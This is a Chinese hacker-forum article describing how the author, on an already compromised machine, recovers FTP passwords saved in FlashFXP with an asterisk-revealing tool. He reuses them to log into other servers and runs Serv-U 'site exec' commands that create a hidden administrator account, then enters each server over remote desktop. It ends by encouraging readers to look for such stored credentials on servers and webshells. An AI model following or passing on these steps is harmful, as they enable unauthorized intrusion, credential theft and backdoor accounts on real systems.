来源：华夏黑客联盟 作者：职业色狼

前几天借朋友一台肉鸡，有一天又上去看了一下。发现这台肉鸡的桌面上有个FlashFXP，FlashFXP是功能强大的FXP/FTP软件,融合了一些其他优秀FTP软件的优点,如像CuteFTP一样可以比较文件夹,支持彩色文字显示;像BpFTP支持多文件夹选择文件,能够缓存文件夹;像LeapFTP一样的外观界面,甚至设计思路也差相仿佛.支持文件夹 (带子文件夹)的文件传送、删除;支持上传、下载及第三方文件续传;可以跳过指定的文件类型,只传送需要的文件;可以自定义不同文件类型的显示颜色;可以缓存远端文件夹列表,支持FTP代理及 Socks 4&5;具有避免空闲功能,防止被站点踢出;可以显示或隐藏“隐藏”属性的文件、文件夹;支持每个站点使用被动模式等.
    但是这个工具有个弱点，我下载了服务器上的ftp文件，点开菜单栏的站点按纽，选择站点管理器。如图1。


可以看到管理员以前连接过的ftp都会记录在这里面,而且保存了密码。这个密码是星号的，可以通过星号密码查看工具来显示，此工具下载地址http://www.onlinedown.net/soft/28712.htm
 

打开星号密码查看器，把鼠标移动到星号密码处，可以看到密码是xxxivot，在服务器上我看见serv-u的配置勾选了执行，这样我们登陆后就可以执行命令。如图
 

而且每个服务器的帐号都是cz,这样大胆测试一下。ftp 219.138.xx.23 输入帐号cz 输入密码时不显示，回车显示230 登陆成功，执行quote site exec net user hxhack hxhack /add 回显200 成功建立一个帐户，quote site exec net localgroup administrators hxhack /add 成功添加到管理员组。
 

用3389登陆一下果然进去了。
 

呵呵打开flashfxp依次把所有服务器IP复制出来，ftp登陆进去按刚才方法逐个添加个用户并成功进入服务器。
 

这次能成功得手也是因为管理员的懒惰和粗心，也告诉了大家不必非得天天拿个扫描器到处扫，平时思维发挥一下，比如在服务器或者webshell里发现诸如此类的软件或者密码都可以去尝试，说不定就有意外的收获。